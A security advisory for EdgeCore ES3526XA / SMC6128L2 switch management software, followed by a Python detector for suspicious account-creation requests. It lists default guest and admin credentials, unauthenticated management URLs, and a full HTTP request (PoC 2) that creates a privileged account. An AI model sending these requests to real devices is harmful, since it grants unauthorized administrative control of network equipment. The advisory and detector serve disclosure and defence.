`*EdgeCore - Layer2+ Fast Ethernet Standalone Switch ES3526XA Manager -
Multiple Vulnerabilities*
Also rebranded as: *SMC TigerSwitch 10/100 SMC6128L2 Manager*
Object ID: 1.3.6.1.4.1.259.8.1.5
Switch Information
________________________________________
Main Board:
  Number of Ports: 26
  Hardware Version: R01
Management Software:
  Loader Version: 1.0.0.2
  Boot-ROM Version: 1.0.0.5
  Operation Code Version: 1.28.16.14
Object ID: 1.3.6.1.4.1.202.20.66
Switch Information
________________________________________
Main Board:
  Number of Ports: 28
  Hardware Version: R01
  Chip Device ID: Marvell 98DX106-B0, 88E6095[F]
  Internal Power Status: Active
Management Software:
  EPLD Version: 0.07
  Loader Version: 1.0.2.0
  Boot-ROM Version: 1.2.0.1
  Operation Code Version: 1.4.18.2
  Role: Master
Other firmware / software versions may also be affected.
*Vendor Response*: These models are no longer supported.
*Vulnerability Details*
*1. Weak Credentials Management*
Guest / guest - priv 0 - read privileges to most device configuration
Admin / admin - priv 15 - read/write access
*Issue:*
Mandatory password change not enforced by the application.
*2. Access Control Flaws*
Any function can be performed by calling its URL directly (GET/POST)
without any authentication. This includes creating new privileged
user(s), changing (admin) passwords, deleting user(s), reading/changing
the device configuration, rebooting the device, etc.
+ Guest can also perform any administrative function, such as adding,
updating, or deleting users.
*PoC 1:*
For example, anyone can access these URLs directly, without any
authentication:
http://IP/config/153/sysinfo.htm?unit=1
http://IP/config/153/port_config.htm?unit=
http://IP/home/153/active_panel_bid0.htm?unit=1
http://IP/config/upnp_config.htm
http://IP/config/153/user_accounts.htm
*PoC 2:*
Create a new privileged account:
POST /config/153/user_accounts.htm HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://IP/config/153/user_accounts.htm
Cookie: expires=Fri, 1 Jan 2016 01:33:07 GMT
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 166
page=userAccount&actionType=Add&sel_account=guest&txt_user_name=guest1&sel_access_level=15&pswd=guest1&pswd_confirm=guest1&txt_user_name2=&passwd_new=&passwd_confirm=
*Issue:*
Application does not enforce access control correctly.
*3. Vulnerable to Cross-Site Request Forgery*
No CSRF token is generated per page and/or per (sensitive) function.
Successful exploitation of this vulnerability can allow silent execution
of unauthorized actions on the device, such as password changes,
configuration parameter changes, saving a modified configuration, and
device reboot.
+++++
`
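
Added example (not part of the original advisory and not vendor code): a detection check for sections 2 and 3 that inspects HTTP requests captured by a proxy or sensor in front of the switch's management interface and flags account-creation requests shaped like PoC 2. The finding names, the helper names, and the Referer/Host comparison used as a CSRF hint are assumptions of this example; the sample requests are constructed.

```python
import base64
from urllib.parse import parse_qs, urlsplit

ADMIN_LEVEL = "15"  # "priv 15" in the advisory; Guest is priv 0

def basic_user(value):
    """User name from a Basic Authorization header value, or None."""
    scheme, _, token = value.partition(" ")
    if scheme.lower() != "basic":
        return None
    try:
        return base64.b64decode(token, validate=True).decode().split(":", 1)[0]
    except ValueError:  # bad base64 or non-UTF-8 bytes
        return None

def inspect_request(raw):
    """Return findings for one captured, CRLF-delimited HTTP request."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target = request_line.split(" ")[:2]
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    if method != "POST" or not urlsplit(target).path.endswith("/user_accounts.htm"):
        return []
    form = parse_qs(body, keep_blank_values=True)
    findings = []
    if form.get("actionType") == ["Add"] and form.get("sel_access_level") == [ADMIN_LEVEL]:
        findings.append("privileged-account-add")
    auth = headers.get("authorization")
    if auth is None:
        findings.append("no-credentials")
    elif basic_user(auth) == "guest":
        findings.append("guest-credentials")
    if urlsplit(headers.get("referer", "")).netloc != headers.get("host"):
        findings.append("cross-site-or-missing-referer")
    return findings

def sample(*extra_headers):
    """Constructed request shaped like PoC 2; 192.0.2.10 is a documentation address."""
    body = "page=userAccount&actionType=Add&txt_user_name=guest1&sel_access_level=15"
    head = ["POST /config/153/user_accounts.htm HTTP/1.1", "Host: 192.0.2.10", *extra_headers]
    return "\r\n".join(head) + "\r\n\r\n" + body

GUEST_ADD = sample("Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=",
                   "Referer: http://192.0.2.10/config/153/user_accounts.htm")
FORGED_ADD = sample("Referer: http://example.test/page.html")
```

Since the vendor no longer supports these models, a check like this belongs on whatever device mediates access to the management interface rather than on the switch itself.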